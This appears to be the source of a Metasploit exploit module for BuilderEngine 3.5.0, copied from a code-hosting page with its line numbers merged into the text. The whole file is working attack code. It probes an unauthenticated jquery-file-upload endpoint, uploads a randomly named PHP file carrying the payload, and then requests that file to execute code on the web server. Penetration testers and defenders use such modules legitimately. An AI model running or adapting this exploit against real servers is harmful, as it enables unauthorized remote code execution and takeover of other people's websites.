Path: blob/master/modules/exploits/multi/http/builderengine_upload_exec.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::FileDropper9include Msf::Exploit::Remote::HttpClient1011def initialize(info = {})12super(13update_info(14info,15'Name' => "BuilderEngine Arbitrary File Upload Vulnerability and execution",16'Description' => %q{17This module exploits a vulnerability found in BuilderEngine 3.5.018via elFinder 2.0. The jquery-file-upload plugin can be abused to upload a malicious19file, which would result in arbitrary remote code execution under the context of20the web server.21},22'License' => MSF_LICENSE,23'Author' => [24'metanubix', # PoC25'Marco Rivoli' # Metasploit26],27'References' => [28['EDB', '40390']29],30'Payload' => {31'BadChars' => "\x00"32},33'DefaultOptions' => {34'EXITFUNC' => 'thread'35},36'Platform' => ['php'],37'Arch' => ARCH_PHP,38'Targets' => [39['BuilderEngine 3.5.0', {}]40],41'Privileged' => false,42'DisclosureDate' => '2016-09-18',43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54OptString.new('TARGETURI', [true, 'The base path to BuilderEngine', '/'])55]56)57end5859def check60uri = target_uri.path61uri << '/' if uri[-1, 1] != '/'6263res = send_request_cgi({64'method' => 'GET',65'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/')66})6768if res && res.code == 200 && !res.body.blank?69return Exploit::CheckCode::Appears70else71return Exploit::CheckCode::Safe72end73end7475def exploit76uri = target_uri.path7778peer = "#{rhost}:#{rport}"79php_pagename = rand_text_alpha(8 + rand(8)) + '.php'80data = Rex::MIME::Message.new81payload_encoded = Rex::Text.rand_text_alpha(1)82payload_encoded << "<?php "83payload_encoded << payload.encoded84payload_encoded << " ?>\r\n"85data.add_part(payload_encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"")86post_data = data.to_s8788res = send_request_cgi({89'uri' => normalize_uri(uri, 'themes/dashboard/assets/plugins/jquery-file-upload/server/php/'),90'method' => 'POST',91'ctype' => "multipart/form-data; boundary=#{data.bound}",92'data' => post_data93})9495if res96if res.code == 200 && res.body =~ /files|#{php_pagename}/97print_good("Our payload is at: #{php_pagename}. Calling payload...")98register_file_for_cleanup(php_pagename)99else100fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")101end102else103fail_with(Failure::Unknown, 'ERROR')104end105106print_status("Calling payload...")107send_request_cgi(108'method' => 'GET',109'uri' => normalize_uri(uri, 'files/', php_pagename)110)111end112end113114115